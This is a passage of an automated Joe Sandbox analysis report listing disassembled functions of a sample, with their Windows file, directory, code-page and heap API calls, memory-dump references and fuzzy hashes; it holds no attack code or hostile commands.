                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00A4551D,?,?,?,?,?,00A44FC7,?), ref: 00A39FE5
                                                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00A3D343,00000001,?,?), ref: 00A3A011
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite$Handle
                                                                                            • String ID:
                                                                                            • API String ID: 4209713984-0
                                                                                            • Opcode ID: 4885c3846e76ed51d121de9c250a54f26d4f19a6727f64d0aa9c1e333a74b052
                                                                                            • Instruction ID: 512f177ef0da2664a6c3a69be25175ea57b31c8b8e1e873bc50b89c28ee92576
                                                                                            • Opcode Fuzzy Hash: 4885c3846e76ed51d121de9c250a54f26d4f19a6727f64d0aa9c1e333a74b052
                                                                                            • Instruction Fuzzy Hash: 2F31DF31208315AFDB18CF20D818BAFB7A5FF95711F00491DF8829B290C7B5AD49CBA2
                                                                                            Function 00A3A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A3C27E: _wcslen.LIBCMT ref: 00A3C284
                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A2D9
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A30C
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2260680371-0
                                                                                            • Opcode ID: e114eb16753bcbe44963ab831a50dce421bbc2c43ea33e8957d969501e39f298
                                                                                            • Instruction ID: 3ed04bf6a9cde8b29f787e09cfaf92c51c1d9805e722c781e8eff13b48ba25f2
                                                                                            • Opcode Fuzzy Hash: e114eb16753bcbe44963ab831a50dce421bbc2c43ea33e8957d969501e39f298
                                                                                            • Instruction Fuzzy Hash: 0101D8395002306AEF21ABF59C49FFE335CAF29781F044414F982EA091D764CA82C6B6
                                                                                            Function 00A5B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A5B8B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID:
                                                                                            • API String ID: 1807457897-3916222277
                                                                                            • Opcode ID: dc5e3ca35d6bf0757ee766c8e422393056e5d587998c957d39b295a653184547
                                                                                            • Instruction ID: 03d1542b240be4011b9cd2ee04c05adc3f982fef929f6158a547a224d85b95b0
                                                                                            • Opcode Fuzzy Hash: dc5e3ca35d6bf0757ee766c8e422393056e5d587998c957d39b295a653184547
                                                                                            • Instruction Fuzzy Hash: FD41F87050428C9EDF218F658C84BE6BBB9FB55306F1404EDEA9A86142D335AA49CB70
                                                                                            Function 00A5AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00A5AFDD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: String
                                                                                            • String ID: LCMapStringEx
                                                                                            • API String ID: 2568140703-3893581201
                                                                                            • Opcode ID: 44730317c8ba9388734f3595d96b95552aa91eebf695ff0302b18d809557663c
                                                                                            • Instruction ID: 5949f6f4ea2154a087a8641c8de5dab711559f6879358a6913c0753bbc1506f9
                                                                                            • Opcode Fuzzy Hash: 44730317c8ba9388734f3595d96b95552aa91eebf695ff0302b18d809557663c
                                                                                            • Instruction Fuzzy Hash: F5010872604209BBCF029FA0DD06DEE7FB2FF18755F014654FE1466160CA728A36EB91
                                                                                            Function 00A5AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A5A56F), ref: 00A5AF55
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                            • API String ID: 2593887523-3084827643
                                                                                            • Opcode ID: 9817afb956ba0a50191c8454039cb50d0743709574645e12463ee11014390dca
                                                                                            • Instruction ID: 457cf5d43c87b95a745005fa735397747c9f7f013d8f465477ae7d55fcad081d
                                                                                            • Opcode Fuzzy Hash: 9817afb956ba0a50191c8454039cb50d0743709574645e12463ee11014390dca
                                                                                            • Instruction Fuzzy Hash: C5F0E972645208BFCF069F94CD02CAD7FB1FF15B12B004554FC085A260DA715E169785
                                                                                            Function 00A5ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Alloc
                                                                                            • String ID: FlsAlloc
                                                                                            • API String ID: 2773662609-671089009
                                                                                            • Opcode ID: 3d703885bbb8a431a560a4bad4bd27ccdc192e59cc9ae44b65319c55b696bfae
                                                                                            • Instruction ID: 1e4fdf57532631624345fc52431d0b2896ab3175e0702bc242d7b76b1bc04543
                                                                                            • Opcode Fuzzy Hash: 3d703885bbb8a431a560a4bad4bd27ccdc192e59cc9ae44b65319c55b696bfae
                                                                                            • Instruction Fuzzy Hash: 8BE0E5737552187BCB01EBA5DC02A6EBBB4EB65B22B010299FC0597280CDB05E0286D6
                                                                                            Function 00A4EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4EAF9
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID: 3Ro
                                                                                            • API String ID: 1269201914-1492261280
                                                                                            • Opcode ID: e26274ebd87ca2327decc46bd0decb6ff002b34821015b6735f5dea9920bc85f
                                                                                            • Instruction ID: 7b75c9990f7efb49ffe2519f3bbbd449f21201c33f1ba8278c9b807b9d730eab
                                                                                            • Opcode Fuzzy Hash: e26274ebd87ca2327decc46bd0decb6ff002b34821015b6735f5dea9920bc85f
                                                                                            • Instruction Fuzzy Hash: A5B0929E29A0427C2D04A2005A06C370128E0C0BA1320952AB401840819C8009010431
                                                                                            Function 00A5BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00A5BA44,?), ref: 00A5B7E6
                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A5BA89,?,00000000), ref: 00A5BC64
                                                                                            • GetCPInfo.KERNEL32(00000000,00A5BA89,?,?,?,00A5BA89,?,00000000), ref: 00A5BC77
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CodeInfoPageValid
                                                                                            • String ID:
                                                                                            • API String ID: 546120528-0
                                                                                            • Opcode ID: 442a0d1dad5494bb688dfece761b28b6c4458e9277726b58ed796a5afdcf2a9e
                                                                                            • Instruction ID: 7ff9952b4d0d32ed70c544ceb170f809909e3139633e6153b95d4d13079ecb50
                                                                                            • Opcode Fuzzy Hash: 442a0d1dad5494bb688dfece761b28b6c4458e9277726b58ed796a5afdcf2a9e
                                                                                            • Instruction Fuzzy Hash: 1C513476A102459FDB20CF75C8816BAFBF4FF45303F18446ED8968B262D735994ACBA0
                                                                                            Function 00A39A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00A39A50,?,?,00000000,?,?,00A38CBC,?), ref: 00A39BAB
                                                                                            • GetLastError.KERNEL32(?,00000000,00A38411,-00009570,00000000,000007F3), ref: 00A39BB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
                                                                                            • Opcode ID: dc493c22af013b94591d6c9caf9b2c1b55931e551625b3a83cd91df98576948a
                                                                                            • Instruction ID: 20490c1d539713d317a8f8d3f7f3de3a04a7b7b813a670f1e7259eba3d054b37
                                                                                            • Opcode Fuzzy Hash: dc493c22af013b94591d6c9caf9b2c1b55931e551625b3a83cd91df98576948a
                                                                                            • Instruction Fuzzy Hash: C3419D71A043018BDB24DF25E58446BF7E5FBD8360F158A2DF89583260D7F0AD458A91
                                                                                            Function 00A5BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A597E5: GetLastError.KERNEL32(?,00A71030,00A54674,00A71030,?,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A597E9
                                                                                              • Part of subcall function 00A597E5: _free.LIBCMT ref: 00A5981C
                                                                                              • Part of subcall function 00A597E5: SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A5985D
                                                                                              • Part of subcall function 00A597E5: _abort.LIBCMT ref: 00A59863
                                                                                              • Part of subcall function 00A5BB4E: _abort.LIBCMT ref: 00A5BB80
                                                                                              • Part of subcall function 00A5BB4E: _free.LIBCMT ref: 00A5BBB4
                                                                                              • Part of subcall function 00A5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00A5BA44,?), ref: 00A5B7E6
                                                                                            • _free.LIBCMT ref: 00A5BA9F
                                                                                            • _free.LIBCMT ref: 00A5BAD5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorLast_abort
                                                                                            • String ID:
                                                                                            • API String ID: 2991157371-0
                                                                                            • Opcode ID: f4cb242497bd4f6ac1dfb12ff5bc4df4da9153def21ec0d81f3f2f9dd797db0e
                                                                                            • Instruction ID: 2a23101a9306d260450a2d50ee02d7a6f7d1dd658d274b0f157a43e7fdfedd34
                                                                                            • Opcode Fuzzy Hash: f4cb242497bd4f6ac1dfb12ff5bc4df4da9153def21ec0d81f3f2f9dd797db0e
                                                                                            • Instruction Fuzzy Hash: 08310571900209AFDB10EFA8C541B9DB7F5FF40363F214099ED04AB2A2EB769D49CB60
                                                                                            Function 00A31E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A31E55
                                                                                              • Part of subcall function 00A33BBA: __EH_prolog.LIBCMT ref: 00A33BBF
                                                                                            • _wcslen.LIBCMT ref: 00A31EFD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2838827086-0
                                                                                            • Opcode ID: 468daf1b3dd6f7b70e5661b4cb94f57d7b163ee6e75e1cf0a14ebfc0ab3369b0
                                                                                            • Instruction ID: 636ebb6e55fbae258579e5397e067a8a1d1165800d7ec687cba8baf6dbf9ea3d
                                                                                            • Opcode Fuzzy Hash: 468daf1b3dd6f7b70e5661b4cb94f57d7b163ee6e75e1cf0a14ebfc0ab3369b0
                                                                                            • Instruction Fuzzy Hash: 08312876904209AFCF15DF98CA45AEEBBF6BF48300F20446AF845A7251CB365E55CB60
                                                                                            Function 00A39DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A373BC,?,?,?,00000000), ref: 00A39DBC
                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A39E70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$BuffersFlushTime
                                                                                            • String ID:
                                                                                            • API String ID: 1392018926-0
                                                                                            • Opcode ID: cf8c402cbdb2790cf6298b9dfdd5bfee9a6e96ed1070e091fce950b750a088fd
                                                                                            • Instruction ID: f16c6e0693dd17be447acec9718c0f5ef987d86cbfd5aa3a8b1e815d57e1360d
                                                                                            • Opcode Fuzzy Hash: cf8c402cbdb2790cf6298b9dfdd5bfee9a6e96ed1070e091fce950b750a088fd
                                                                                            • Instruction Fuzzy Hash: 4221E132248386AFC714DF75C892AABBBE8AF95344F08491DF4C587141D3A9E90DDB61
                                                                                            Function 00A3966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00A39F27,?,?,00A3771A), ref: 00A396E6
                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00A39F27,?,?,00A3771A), ref: 00A39716
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 52f5daddc81d069a4bdc16a68fb3eebea05c0c1e12d1b6270d78eee5d5021e40
                                                                                            • Instruction ID: 41cb077a74a8474713deadb5b539a3fc17669ac4d176b993c6f27d714fa41f2c
                                                                                            • Opcode Fuzzy Hash: 52f5daddc81d069a4bdc16a68fb3eebea05c0c1e12d1b6270d78eee5d5021e40
                                                                                            • Instruction Fuzzy Hash: D021C1715003446FE3308B65CD8AFA7B7DCEB49320F004A19FA96C21D2C7B8A8858671
                                                                                            Function 00A39E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00A39EC7
                                                                                            • GetLastError.KERNEL32 ref: 00A39ED4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
                                                                                            • Opcode ID: 0594ba415e1fc22b0d784238ba20c5058722929a10bcf5be15f9220cd68f999d
                                                                                            • Instruction ID: 41253dddb4ff9336d0d1becd0b22d1a1321ae615a8d870241039b14203a3d8fe
                                                                                            • Opcode Fuzzy Hash: 0594ba415e1fc22b0d784238ba20c5058722929a10bcf5be15f9220cd68f999d
                                                                                            • Instruction Fuzzy Hash: BF118231600700ABD724C768CC45BA7B7F9AB45361F608A29F553D26D0D7F0ED4AC660
                                                                                            Function 00A58E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00A58E75
                                                                                              • Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00A71098,00A317CE,?,?,00000007,?,?,?,00A313D6,?,00000000), ref: 00A58EB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
